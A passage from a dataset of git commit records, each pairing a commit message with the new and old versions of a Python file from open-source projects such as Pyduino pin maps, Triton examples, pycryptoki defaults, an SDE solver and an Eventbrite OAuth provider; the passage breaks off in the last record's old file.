e692b2f3dc7e45c389f6a4a1969229fd04f617f7 | Fix up IO-to-pin iterable lists. | synapse-wireless/pyduino-includes | pyduinoincludes/io.py | pyduinoincludes/io.py | # Copyright (C) 2016 Synapse Wireless, Inc.
# Subject to your agreement of the disclaimer set forth below, permission is given by Synapse Wireless, Inc. ("Synapse") to you to freely modify, redistribute or include this SNAPpy code in any program. The purpose of this code is to help you understand and learn about SNAPpy by code examples.
# BY USING ALL OR ANY PORTION OF THIS SNAPPY CODE, YOU ACCEPT AND AGREE TO THE BELOW DISCLAIMER. If you do not accept or agree to the below disclaimer, then you may not use, modify, or distribute this SNAPpy code.
# THE CODE IS PROVIDED UNDER THIS LICENSE ON AN "AS IS" BASIS, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES THAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN ANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. UNDER NO CIRCUMSTANCES WILL SYNAPSE BE LIABLE TO YOU, OR ANY OTHER PERSON OR ENTITY, FOR ANY LOSS OF USE, REVENUE OR PROFIT, LOST OR DAMAGED DATA, OR OTHER COMMERCIAL OR ECONOMIC LOSS OR FOR ANY DAMAGES WHATSOEVER RELATED TO YOUR USE OR RELIANCE UPON THE SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES OR IF SUCH DAMAGES ARE FORESEEABLE. THIS DISCLAIMER OF WARRANTY AND LIABILITY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED CODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.
"""GPIO-related assignments for the Pyduino based on the Synapse SM220 module."""
# GPIO enums to be used in example scripts, mapped to Pyduino IO numbers as supported by the SNAP core firmware
D0 = 16
D1 = 17
D2 = 20
D3 = 5
D4 = 23
D5 = 6
D6 = 7
D7 = 12
D8 = 0
D9 = 19
D10 = 21
D11 = 37
D12 = 4
D13 = 22
SDA = 9
SCL = 8
# Analog channels
A0 = 0
A1 = 1
A2 = 4
A3 = 5
A4 = 6
A5 = 7
SENSE_5V = 2
# User-controlled LED
LED_PIN = 18
# List of pin assignments that can be iterated over in Pyduino-pin-order (i.e. D0 is 16, D1 is 17, etc...)
DIGITAL_TO_IO_LIST = (16, 17, 20, 5, 23, 6, 7, 12, 0, 19, 21, 37, 4, 22, 9, 8)
ANALOG_LIST = (A0, A1, A2, A3, A4, A5)
| # Copyright (C) 2016 Synapse Wireless, Inc.
# Subject to your agreement of the disclaimer set forth below, permission is given by Synapse Wireless, Inc. ("Synapse") to you to freely modify, redistribute or include this SNAPpy code in any program. The purpose of this code is to help you understand and learn about SNAPpy by code examples.
# BY USING ALL OR ANY PORTION OF THIS SNAPPY CODE, YOU ACCEPT AND AGREE TO THE BELOW DISCLAIMER. If you do not accept or agree to the below disclaimer, then you may not use, modify, or distribute this SNAPpy code.
# THE CODE IS PROVIDED UNDER THIS LICENSE ON AN "AS IS" BASIS, WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, WITHOUT LIMITATION, WARRANTIES THAT THE COVERED CODE IS FREE OF DEFECTS, MERCHANTABLE, FIT FOR A PARTICULAR PURPOSE OR NON-INFRINGING. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE COVERED CODE IS WITH YOU. SHOULD ANY COVERED CODE PROVE DEFECTIVE IN ANY RESPECT, YOU (NOT THE INITIAL DEVELOPER OR ANY OTHER CONTRIBUTOR) ASSUME THE COST OF ANY NECESSARY SERVICING, REPAIR OR CORRECTION. UNDER NO CIRCUMSTANCES WILL SYNAPSE BE LIABLE TO YOU, OR ANY OTHER PERSON OR ENTITY, FOR ANY LOSS OF USE, REVENUE OR PROFIT, LOST OR DAMAGED DATA, OR OTHER COMMERCIAL OR ECONOMIC LOSS OR FOR ANY DAMAGES WHATSOEVER RELATED TO YOUR USE OR RELIANCE UPON THE SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGES OR IF SUCH DAMAGES ARE FORESEEABLE. THIS DISCLAIMER OF WARRANTY AND LIABILITY CONSTITUTES AN ESSENTIAL PART OF THIS LICENSE. NO USE OF ANY COVERED CODE IS AUTHORIZED HEREUNDER EXCEPT UNDER THIS DISCLAIMER.
"""GPIO-related assignments for the Pyduino based on the Synapse SM220 module."""
# GPIO enums to be used in example scripts, mapped to Pyduino IO numbers as supported by the SNAP core firmware
D0 = 16
D1 = 17
D2 = 20
D3 = 5
D4 = 23
D5 = 6
D6 = 7
D7 = 12
D8 = 0
D9 = 19
D10 = 21
D11 = 37
D12 = 4
D13 = 22
SDA = 9
SCL = 8
# Analog channels
A0 = 0
A1 = 1
A2 = 4
A3 = 5
A4 = 6
A5 = 7
SENSE_5V = 2
# User-controlled LED
LED_PIN = 18
# List of pin assignments that can be iterated over in GPIO-order (i.e. GPIO 0 is 16, GPIO 1 is 17, etc...)
GPIO_TO_IO_LIST = (16,17,20,5,23,6,7,12,0,19,21,37,4,22,9,8)
| apache-2.0 | Python |
cb876e51d18c17efb662e1725a8ae6206f2d8e9f | update __init__.py file | christophreimer/pygeobase | pygeobase/__init__.py | pygeobase/__init__.py | import pkg_resources
try:
__version__ = pkg_resources.get_distribution(__name__).version
except:
__version__ = 'unknown'
| from ._version import get_versions
__version__ = get_versions()['version']
del get_versions
| bsd-3-clause | Python |
5b5f2b05251b991620c29316dbfeac52f8cfa119 | Update helper example/callback.py with some output verbose | JonathanSalwan/Triton,JonathanSalwan/Triton,JonathanSalwan/Triton,JonathanSalwan/Triton,JonathanSalwan/Triton | examples/callback.py | examples/callback.py |
from triton import *
# Output
#
# TID (0) 0x40056d push rbp
# TID (0) 0x40056e mov rbp, rsp
# TID (0) 0x400571 mov qword ptr [rbp-0x18], rdi
# TID (0) 0x400575 mov dword ptr [rbp-0x4], 0x0
# TID (0) 0x40057c jmp 0x4005bd
# TID (0) 0x4005bd cmp dword ptr [rbp-0x4], 0x4
# TID (0) 0x4005c1 jle 0x40057e
# TID (0) 0x40057e mov eax, dword ptr [rbp-0x4]
# TID (0) 0x400581 movsxd rdx, eax
# TID (0) 0x400584 mov rax, qword ptr [rbp-0x18]
# TID (0) 0x400588 add rax, rdx
# TID (0) 0x40058b movzx eax, byte ptr [rax]
# TID (0) 0x40058e movsx eax, al
# TID (0) 0x400591 sub eax, 0x1
# TID (0) 0x400594 xor eax, 0x55
# TID (0) 0x400597 mov ecx, eax
# TID (0) 0x400599 mov rdx, qword ptr [rip+0x200aa0]
# TID (0) 0x4005a0 mov eax, dword ptr [rbp-0x4]
# TID (0) 0x4005a3 cdqe
# TID (0) 0x4005a5 add rax, rdx
# TID (0) 0x4005a8 movzx eax, byte ptr [rax]
# TID (0) 0x4005ab movsx eax, al
# TID (0) 0x4005ae cmp ecx, eax
# TID (0) 0x4005b0 jz 0x4005b9
# TID (0) 0x4005b2 mov eax, 0x1
# TID (0) 0x4005b7 jmp 0x4005c8
# TID (0) 0x4005c8 pop rbp
# A callback must be a function with one argument. This argument is always a dict and contains all information
def my_callback_before(instruction):
print 'TID (%d) %#x %s' %(instruction['threadId'], instruction['address'], instruction['assembly'])
if __name__ == '__main__':
# Start the symbolic analysis from the 'check' function
startAnalysisFromSymbol('check')
# Add a callback.
# CB_BEFORE: Add the callback before the instruction processing
# CB_AFTER: Add the callback after the instruction processing
addCallback(my_callback_before, CB_BEFORE)
# Run the instrumentation - Never returns
runProgram()
|
from triton import *
def my_callback_before(instruction):
print 'TID (%d) %#x %s' %(instruction['threadId'], instruction['address'], instruction['assembly'])
if __name__ == '__main__':
# Start the symbolic analysis from the 'check' function
startAnalysisFromSymbol('check')
# Add a callback
addCallback(my_callback_before, CB_BEFORE)
# Run the instrumentation - Never returns
runProgram()
| apache-2.0 | Python |
b9f8d73c984e21915a60d986d5f49fb4b2cb7470 | Update defaults.py | gemalto/pycryptoki | pycryptoki/defaults.py | pycryptoki/defaults.py | """
A file containing commonly used strings or other data similar to a config file
"""
# The location of the cryptoki file, if specified as None the environment variable
# ChrystokiConfigurationPath will be used or it will revert to using /etc/Chrystoki.conf
import os
CHRYSTOKI_CONFIG_FILE = None
# The location of the DLL file, if not specified it will try to look up the file in
# the Chrystoki config file specified be the variable CHRYSTOKI_CONFIG_FILE
CHRYSTOKI_DLL_FILE = None
ADMIN_PARTITION_LABEL = 'no label'
AUDITOR_LABEL = 'auditorlabel'
ADMINISTRATOR_USERNAME = 'Administrator'
ADMINISTRATOR_PASSWORD = 'sopin'
AUDITOR_USERNAME = 'Auditor'
AUDITOR_PASSWORD = 'auditpin'
CO_USERNAME = 'Crypto Officer'
CO_PASSWORD = 'userpin'
DEFAULT_USERNAME = 'default_user'
DEFAULT_LABEL = 'default_label'
DEFAULT_PASSWORD = 'userpin'
DEFAULT_UTILS_PATH = '/usr/safenet/lunaclient/sbin'
FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
user_credentials = {ADMINISTRATOR_USERNAME: ADMINISTRATOR_PASSWORD,
AUDITOR_USERNAME: AUDITOR_PASSWORD,
CO_USERNAME: CO_PASSWORD,
DEFAULT_USERNAME: DEFAULT_PASSWORD}
DES3_KEY_SIZE = 120
MANUFACTURER_ID = "SafeNet Inc."
MODEL = "Luna K6"
ADMIN_SLOT = int(os.environ.get("ADMIN_SLOT", 1))
| """
A file containing commonly used strings or other data similar to a config file
"""
# The location of the cryptoki file, if specified as None the environment variable
# ChrystokiConfigurationPath will be used or it will revert to using /etc/Chrystoki.conf
import os
CHRYSTOKI_CONFIG_FILE = None
# The location of the DLL file, if not specified it will try to look up the file in
# the Chrystoki config file specified be the variable CHRYSTOKI_CONFIG_FILE
CHRYSTOKI_DLL_FILE = None
ADMIN_PARTITION_LABEL = 'no label'
AUDITOR_LABEL = 'auditorlabel'
ADMINISTRATOR_USERNAME = 'Administrator'
ADMINISTRATOR_PASSWORD = '1q@W3e$R'
AUDITOR_USERNAME = 'Auditor'
AUDITOR_PASSWORD = 'W3e$R'
CO_USERNAME = 'Crypto Officer'
CO_PASSWORD = 'userpin'
DEFAULT_USERNAME = 'default_user'
DEFAULT_LABEL = 'default_label'
DEFAULT_PASSWORD = 'userpin'
DEFAULT_UTILS_PATH = '/usr/safenet/lunaclient/sbin'
FORMAT = "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
user_credentials = {ADMINISTRATOR_USERNAME: ADMINISTRATOR_PASSWORD,
AUDITOR_USERNAME: AUDITOR_PASSWORD,
CO_USERNAME: CO_PASSWORD,
DEFAULT_USERNAME: DEFAULT_PASSWORD}
DES3_KEY_SIZE = 120
MANUFACTURER_ID = "SafeNet Inc."
MODEL = "Luna K6"
ADMIN_SLOT = int(os.environ.get("ADMIN_SLOT", 1))
| apache-2.0 | Python |
26df9fbabc1bc23644fede1cee4405454ea73b0d | Optimize SDE integration | kpj/SDEMotif,kpj/SDEMotif | solver.py | solver.py | """
Solve stochastic differential equation
"""
import numpy as np
import numpy.random as npr
def solve_system(system, tmax=50, dt=0.1, seed=None):
""" Solve stochastic differential equation (SDE)
"""
J = system.jacobian
D = system.fluctuation_vector
E = system.external_influence
dim = J.shape[0]
state = system.initial_state
evolution = []
dtsq = np.sqrt(dt)
tdsq = np.sqrt(2*D)
np.seterr(all='raise')
npr.seed(seed)
t = 0
while t < tmax:
evolution.append(state)
delta = J.dot(state) + tdsq * dtsq * npr.normal(size=(dim,)) + E
state = state + dt * delta
t += dt
return np.array(evolution).T
def get_steady_state(sol):
""" Extract steady state from given solution
"""
return sol.T[-1]
| """
Solve stochastic differential equation
"""
import numpy as np
import numpy.random as npr
def solve_system(system, tmax=50, dt=0.1, seed=None):
""" Solve stochastic differential equation (SDE)
"""
J = system.jacobian
D = system.fluctuation_vector
E = system.external_influence
eq = lambda X, i: \
sum([J[i, j]*X[j] for j in range(J.shape[1])]) \
+ np.sqrt(2 * D[i]) * np.sqrt(dt) * npr.normal() \
+ E[i]
state = system.initial_state
evolution = []
np.seterr(all='raise')
npr.seed(seed)
t = 0
while t < tmax:
evolution.append(state)
state = state + dt * np.array([eq(state, i) for i in range(J.shape[0])])
t += dt
return np.array(evolution).T
def get_steady_state(sol):
""" Extract steady state from given solution
"""
return sol.T[-1]
| mit | Python |
9d57de48f4b786ac746be0190f6e21bfecfa165b | Extend variance to 99.9%. | lmjohns3/cube-experiment,lmjohns3/cube-experiment,lmjohns3/cube-experiment | analysis/compress-jacobians.py | analysis/compress-jacobians.py | #!/usr/bin/env python
import climate
import joblib
import lmj.pca
import numpy as np
import os
import database
logging = climate.get_logger('compress')
def extract(trial, prefix):
trial.load()
cols = [c for c in trial.df.columns if c.startswith(prefix)]
return trial.df[cols].values
@climate.annotate(
root='load experiment data from this root',
output='store pca and jacobians in this directory',
pattern=('only load trials matching this pattern', 'option'),
count=('only use this many jacobians for PCA', 'option', None, int),
variance=('retain components to preserve this variance', 'option', None, float),
)
def main(root, output, pattern='*', count=10000, variance=0.999):
trials = list(database.Experiment(root).trials_matching(pattern))
proc = joblib.delayed(extract)
for prefix in ('fwd', 'inv'):
jacobia = []
for jacs in joblib.Parallel(-1)(proc(t, 'jac-' + prefix) for t in trials):
for jac in jacs:
if np.all(abs(jac) < 1e8):
jacobia.append(jac)
pca = lmj.pca.PCA()
pca_file = os.path.join(output, 'pca-{}.npz'.format(prefix))
if os.path.exists(pca_file):
pca.load(pca_file)
else:
idx = np.arange(len(jacobia))
np.random.shuffle(idx)
pca.fit(np.asarray([jacobia[i] for i in idx[:count]]))
pca.save(pca_file)
for v in (0.5, 0.8, 0.9, 0.95, 0.98, 0.99, 0.995, 0.998, 0.999):
print('{:.1f}%: {} components'.format(100 * v, pca.num_components(v)))
enc = pca.encode(jacobia, retain=variance)
enc_file = os.path.join(output, 'jac-{}.npy'.format(prefix))
logging.info('%s: saving %s %s', enc_file, enc.shape, enc.dtype)
np.save(enc_file, enc)
if __name__ == '__main__':
climate.call(main)
| #!/usr/bin/env python
import climate
import joblib
import lmj.pca
import numpy as np
import os
import database
logging = climate.get_logger('compress')
def jac(trial, prefix):
trial.load()
cols = [c for c in trial.df.columns if c.startswith(prefix)]
return trial.df[cols].values
@climate.annotate(
root='load experiment data from this root',
output='store pca and jacobians in this directory',
pattern=('only load trials matching this pattern', 'option'),
count=('only use this many jacobians for PCA', 'option', None, int),
variance=('retain components to preserve this variance', 'option', None, float),
)
def main(root, output, pattern='*', count=10000, variance=0.99):
trials = list(database.Experiment(root).trials_matching(pattern))
proc = joblib.delayed(jac)
for prefix in ('fwd', 'inv'):
jacobia = []
for jacs in joblib.Parallel(-1)(proc(t, 'jac-' + prefix) for t in trials):
jacobia.extend(jacs)
pca = lmj.pca.PCA()
pca_file = os.path.join(output, 'pca-{}.npz'.format(prefix))
if os.path.exists(pca_file):
pca.load(pca_file)
else:
idx = np.arange(len(jacobia))
np.random.shuffle(idx)
pca.fit(np.asarray([jacobia[i] for i in idx[:count]]))
pca.save(pca_file)
for v in (0.5, 0.8, 0.9, 0.95, 0.98, 0.99):
print('{:.1f}%: {} components'.format(100 * v, pca.num_components(v)))
enc = pca.encode(jacobia, retain=variance)
enc_file = os.path.join(output, 'jac-{}.npy'.format(prefix))
logging.info('%s: saving %s %s', enc_file, enc.shape, enc.dtype)
np.save(enc_file, enc)
if __name__ == '__main__':
climate.call(main)
| mit | Python |
5657c925e5693931320b4eb5738e332d5899120d | Improve EvaluationFactory | SCUEvals/scuevals-api,SCUEvals/scuevals-api | tests/fixtures/factories/evaluation.py | tests/fixtures/factories/evaluation.py | import factory
from .professor import ProfessorFactory
from .section import SectionFactory
from .student import StudentFactory
from scuevals_api import models
from scuevals_api.resources.evaluations import EvaluationSchemaV1
eval_v1_data = {
'attitude': 1,
'availability': 1,
'clarity': 1,
'grading_speed': 1,
'resourcefulness': 1,
'easiness': 1,
'workload': 1,
'recommended': 1,
'comment': 'Love the lectures'
}
EvaluationSchemaV1().load(data=eval_v1_data)
class EvaluationFactory(factory.alchemy.SQLAlchemyModelFactory):
class Meta:
model = models.Evaluation
sqlalchemy_session = models.db.session
version = 1
data = eval_v1_data
display_grad_year = True
display_majors = True
student = factory.SubFactory(StudentFactory)
professor = factory.SubFactory(ProfessorFactory)
section = factory.SubFactory(SectionFactory)
| import factory
from .professor import ProfessorFactory
from .section import SectionFactory
from .student import StudentFactory
from scuevals_api import models
class EvaluationFactory(factory.alchemy.SQLAlchemyModelFactory):
class Meta:
model = models.Evaluation
sqlalchemy_session = models.db.session
version = 1
data = {"test": 1}
display_grad_year = True
display_majors = True
student = factory.SubFactory(StudentFactory)
professor = factory.SubFactory(ProfessorFactory)
section = factory.SubFactory(SectionFactory)
| agpl-3.0 | Python |
6c2c40e5e5915f1ebed1302933d6257a14e163d9 | Fix accidental conflict diff | spool/django-allauth,spool/django-allauth,spool/django-allauth | allauth/socialaccount/providers/eventbrite/provider.py | allauth/socialaccount/providers/eventbrite/provider.py | """Customise Provider classes for Eventbrite API v3."""
from allauth.socialaccount.providers.base import ProviderAccount
from allauth.socialaccount.providers.oauth2.provider import OAuth2Provider
class EventbriteAccount(ProviderAccount):
"""ProviderAccount subclass for Eventbrite."""
def get_avatar_url(self):
"""Return avatar url."""
return self.account.extra_data['image_id']
class EventbriteProvider(OAuth2Provider):
"""OAuth2Provider subclass for Eventbrite."""
id = 'eventbrite'
name = 'Eventbrite'
account_class = EventbriteAccount
def extract_uid(self, data):
"""Extract uid ('id') and ensure it's a str."""
return str(data['id'])
def extract_common_fields(self, data):
"""Extract fields from a basic user query."""
return dict(
emails=data.get('emails'),
id=data.get('id'),
name=data.get('name'),
first_name=data.get('first_name'),
last_name=data.get('last_name'),
image_url=data.get('image_url')
)
provider_classes = [EventbriteProvider]
| """Customise Provider classes for Eventbrite API v3."""
from allauth.socialaccount.providers.base import ProviderAccount
from allauth.socialaccount.providers.oauth2.provider import OAuth2Provider
class EventbriteAccount(ProviderAccount):
"""ProviderAccount subclass for Eventbrite."""
def get_avatar_url(self):
"""Return avatar url."""
return self.account.extra_data['image_id']
class EventbriteProvider(OAuth2Provider):
"""OAuth2Provider subclass for Eventbrite."""
id = 'eventbrite'
name = 'Eventbrite'
account_class = EventbriteAccount
def extract_uid(self, data):
"""Extract uid ('id') and ensure it's a str."""
return str(data['id'])
<<<<<<< HEAD
=======
def get_default_scope(self):
"""Ensure scope is null to fit their API."""
return ['']
>>>>>>> c32ec1de9b8af42147d2977fe173d25643be447a
def extract_common_fields(self, data):
"""Extract fields from a basic user query."""
return dict(
emails=data.get('emails'),
id=data.get('id'),
name=data.get('name'),
first_name=data.get('first_name'),
last_name=data.get('last_name'),
image_url=data.get('image_url')
)
provider_classes = [EventbriteProvider]
| mit | Python |
de611106429ef9c6cfbc13e48cee5e88affe7ab8 | Modify models.py | NTsystems/NoTes-API,NTsystems/NoTes-API,NTsystems/NoTes-API | notes/apps/auth/models.py | notes/apps/auth/models.py | from django.db import models
from django.contrib.auth.models import AbstractBaseUser
class User(AbstractBaseUser):
password = models.CharField(_('password'), max_length=50)
e_mail = models.EmailField(unique=True)
is_admin = models.BooleanField(default=False)
USERNAME_FIELD = 'e_mail'
REQUIRED_FIELDS = []
def get_username(self):
""" Returns the value of the field nominated by USERNAME_FIELD."""
return getattr(self, self.USERNAME_FIELD)
def is_authenticated(self):
"""Return True. This is a way to tell if the user has been authenticated."""
return True
def set_password(self, raw_password):
self.password = make_password(raw_password)
def check_password(self, raw_password):
def setter(self, raw_password):
self.set_password(raw_password)
self.save(update_fields=["password"])
return check_password(raw_password, self.password, setter)
def set_unusable_password(self):
self.password = make_password(None)
class Meta:
permission = ('change_password',)
def __str__(self):
return self.username
class UserProfile(models.Model):
# This line is required. Links UserProfile to a User model instance.
user = models.OneToOneField(User)
first_name = models.CharField(max_length=30, blank=True)
last_name = models.CharField(max_length=30, blank=True)
date_of_birth = models.DateField(blank=True)
place = models.CharField(max_length=50, blank=True)
state = models.CharField(verbose_name='country', max_length=50, blank=True)
class Meta:
permission = ('change_date_of_birth', 'change_place', 'change_state',)
def get_full_name(self):
full_name = '%s %s' % (self.first_name, self.last_name)
return full_name | from django.db import models
from django.contrib.auth.models import AbstractBaseUser
class User(AbstractBaseUser):
username = models.CharField(max_length=30, unique=True)
password = models.CharField(max_length=30)
is_admin = models.BooleanField(default=False)
USERNAME_FIELD = 'username'
REQUIRED_FIELDS = []
class Meta:
permission = ('change_password',)
def __str__(self):
return self.username
class UserProfile(models.Model):
user = models.OneToOneField(User)
first_name = models.CharField(max_length=30, blank=True)
last_name = models.CharField(max_length=30, blank=True)
date_of_birth = models.DateField(blank=True)
e_mail = models.EmailField(verbose_name='e-mail',blank=True)
place = models.CharField(max_length=50, blank=True)
state = models.CharField(verbose_name='country', max_length=50, blank=True)
class Meta:
permission = ('change_date_of_birth', 'change_place', 'change_state',)
def get_full_name(self):
full_name = '%s %s' % (self.first_name, self.last_name)
return full_name | mit | Python |
5af50ae039c72b495ba0dff12cdfca4e1adf6769 | Add a TODO to sharding | LPgenerator/django-cacheops,Suor/django-cacheops | cacheops/sharding.py | cacheops/sharding.py | from funcy import cached_property
from django.core.exceptions import ImproperlyConfigured
from .conf import settings
def get_prefix(**kwargs):
return settings.CACHEOPS_PREFIX(PrefixQuery(**kwargs))
class PrefixQuery(object):
def __init__(self, **kwargs):
assert set(kwargs) <= {'func', '_queryset', '_cond_dnfs', 'dbs', 'tables'}
kwargs.setdefault('func', None)
self.__dict__.update(kwargs)
@cached_property
def dbs(self):
return [self._queryset.db]
@cached_property
def db(self):
if len(self.dbs) > 1:
dbs_str = ', '.join(self.dbs)
raise ImproperlyConfigured('Single db required, but several used: ' + dbs_str)
return self.dbs[0]
# TODO: think if I should expose it and how. Same for queryset.
@cached_property
def _cond_dnfs(self):
return self._queryset._cond_dnfs
@cached_property
def tables(self):
return list(self._cond_dnfs)
@cached_property
def table(self):
if len(self.tables) > 1:
tables_str = ', '.join(self.tables)
raise ImproperlyConfigured('Single table required, but several used: ' + tables_str)
return self.tables[0]
| from funcy import cached_property
from django.core.exceptions import ImproperlyConfigured
from .conf import settings
def get_prefix(**kwargs):
return settings.CACHEOPS_PREFIX(PrefixQuery(**kwargs))
class PrefixQuery(object):
def __init__(self, **kwargs):
assert set(kwargs) <= {'func', '_queryset', '_cond_dnfs', 'dbs', 'tables'}
kwargs.setdefault('func', None)
self.__dict__.update(kwargs)
@cached_property
def dbs(self):
return [self._queryset.db]
@cached_property
def db(self):
if len(self.dbs) > 1:
dbs_str = ', '.join(self.dbs)
raise ImproperlyConfigured('Single db required, but several used: ' + dbs_str)
return self.dbs[0]
@cached_property
def _cond_dnfs(self):
return self._queryset._cond_dnfs
@cached_property
def tables(self):
return list(self._cond_dnfs)
@cached_property
def table(self):
if len(self.tables) > 1:
tables_str = ', '.join(self.tables)
raise ImproperlyConfigured('Single table required, but several used: ' + tables_str)
return self.tables[0]
| bsd-3-clause | Python |
f637b84a0ec13fdae1e91030161afb0e59bcbabc | remove unused var | dankilman/pysource,dankilman/pysource | pysource/arguments.py | pysource/arguments.py | # Copyright 2014 Dan Kilman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from argh.utils import get_arg_spec
class ArgTypeSpec(object):
def __init__(self, function):
self.function_name = function.__name__
spec = get_arg_spec(function)
args_len = len(spec.args)
defaults = spec.defaults or []
if len(defaults) < args_len:
prefix = [str for _ in range(args_len - len(defaults))]
defaults = prefix + list(defaults)
self.types = defaults
self.len_types = len(self.types)
self.has_varargs = spec.varargs is not None
def parse(self, args):
len_args = len(args)
if not self.has_varargs and len_args != self.len_types:
raise RuntimeError(
'{0}() takes exactly {1} arguments ({2} given)'
.format(self.function_name, self.len_types, len_args))
if self.has_varargs and len_args < self.len_types:
raise RuntimeError(
'{0}() takes at least {1} arguments ({2} given)'
.format(self.function_name, self.len_types, len_args))
parsed_args = [tpe(arg) for (tpe, arg) in zip(self.types, args)]
varargs = args[self.len_types:]
return parsed_args + varargs
| # Copyright 2014 Dan Kilman
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from argh.utils import get_arg_spec
class ArgTypeSpec(object):
def __init__(self, function):
self.function_name = function.__name__
spec = get_arg_spec(function)
args_len = len(spec.args)
defaults = spec.defaults or []
if len(defaults) < args_len:
prefix = [str for _ in range(args_len - len(defaults))]
defaults = prefix + list(defaults)
self.types = defaults
self.len_types = len(self.types)
self.has_varargs = spec.varargs is not None
self.has_kwargs = spec.keywords is not None
def parse(self, args):
len_args = len(args)
if not self.has_varargs and len_args != self.len_types:
raise RuntimeError(
'{0}() takes exactly {1} arguments ({2} given)'
.format(self.function_name, self.len_types, len_args))
if self.has_varargs and len_args < self.len_types:
raise RuntimeError(
'{0}() takes at least {1} arguments ({2} given)'
.format(self.function_name, self.len_types, len_args))
parsed_args = [tpe(arg) for (tpe, arg) in zip(self.types, args)]
varargs = args[self.len_types:]
return parsed_args + varargs
| apache-2.0 | Python |
9275eb01ef0bcdcefb46eb936d6a85c921e92e9f | make the void return type not return an explicit Py_None, to prevent a bug hwere None is being returned as first element of tuple when there are out/inout parameters | ftalbrecht/pybindgen,gjcarneiro/pybindgen,ftalbrecht/pybindgen,cawka/pybindgen-old,gjcarneiro/pybindgen,ftalbrecht/pybindgen,gjcarneiro/pybindgen,gjcarneiro/pybindgen,ftalbrecht/pybindgen,cawka/pybindgen-old,cawka/pybindgen-old,cawka/pybindgen-old | pybindgen/typehandlers/voidtype.py | pybindgen/typehandlers/voidtype.py | # docstrings not neede here (the type handler interfaces are fully
# documented in base.py) pylint: disable-msg=C0111
from base import ReturnValue
class VoidReturn(ReturnValue):
CTYPES = ['void']
def get_c_error_return(self):
return "return;"
def convert_python_to_c(self, wrapper):
wrapper.parse_params.add_parameter("", [], prepend=True)
def convert_c_to_python(self, wrapper):
pass
| # docstrings not neede here (the type handler interfaces are fully
# documented in base.py) pylint: disable-msg=C0111
from base import ReturnValue
class VoidReturn(ReturnValue):
CTYPES = ['void']
def get_c_error_return(self):
return "return;"
def convert_python_to_c(self, wrapper):
wrapper.parse_params.add_parameter("", [], prepend=True)
def convert_c_to_python(self, wrapper):
wrapper.build_params.add_parameter("O", ['Py_None'], prepend=True)
| lgpl-2.1 | Python |
47c65ea8a642e7e7494cc403c00158b90ad359a5 | Delete debug message from theano_functions.py | nkoep/pymanopt,tingelst/pymanopt,pymanopt/pymanopt,nkoep/pymanopt,nkoep/pymanopt,j-towns/pymanopt,pymanopt/pymanopt | pymanopt/tools/theano_functions.py | pymanopt/tools/theano_functions.py | """
Module containing functions to compile and differentiate Theano graphs. Part of
the pymanopt package.
Jamie Townsend December 2014
"""
import theano.tensor as T
import theano
from warnings import warn
def compile(objective, argument):
"""
Wrapper for the theano.function(). Compiles a theano graph into a python
function.
"""
return theano.function([argument], objective)
def gradient(objective, argument):
"""
Wrapper for theano.tensor.grad().
Compute the gradient of 'objective' with respect to 'argument' and return
compiled version.
"""
g = T.grad(objective, argument)
return compile(g, argument)
def grad_hess(objective, argument):
"""
Compute both the gradient and the directional derivative of the gradient
(which is equal to the hessian multiplied by direction).
"""
g = T.grad(objective, argument)
grad = compile(g, argument)
# Create a new tensor A, which has the same type (i.e. same dimensionality)
# as argument.
A = argument.type()
try:
# First attempt efficient 'R-op', this directly calculates the
# directional derivative of the gradient, rather than explicitly
# calculating the hessian and then multiplying.
R = T.Rop(g, argument, A)
except NotImplementedError:
shp = T.shape(argument)
H = T.jacobian(g.flatten(), argument).reshape(
T.concatenate([shp, shp]), 2*A.ndim)
R = T.tensordot(H, A, A.ndim)
try:
hess = theano.function([argument, A], R, on_unused_input='raise')
except theano.compile.UnusedInputError:
warn('Theano detected unused input - suggests hessian may be zero or '
'constant.')
hess = theano.function([argument, A], R, on_unused_input='ignore')
return grad, hess
| """
Module containing functions to compile and differentiate Theano graphs. Part of
the pymanopt package.
Jamie Townsend December 2014
"""
import theano.tensor as T
import theano
from warnings import warn
def compile(objective, argument):
"""
Wrapper for the theano.function(). Compiles a theano graph into a python
function.
"""
return theano.function([argument], objective)
def gradient(objective, argument):
"""
Wrapper for theano.tensor.grad().
Compute the gradient of 'objective' with respect to 'argument' and return
compiled version.
"""
g = T.grad(objective, argument)
return compile(g, argument)
def grad_hess(objective, argument):
"""
Compute both the gradient and the directional derivative of the gradient
(which is equal to the hessian multiplied by direction).
"""
g = T.grad(objective, argument)
grad = compile(g, argument)
# Create a new tensor A, which has the same type (i.e. same dimensionality)
# as argument.
A = argument.type()
try:
# First attempt efficient 'R-op', this directly calculates the
# directional derivative of the gradient, rather than explicitly
# calculating the hessian and then multiplying.
R = T.Rop(g, argument, A)
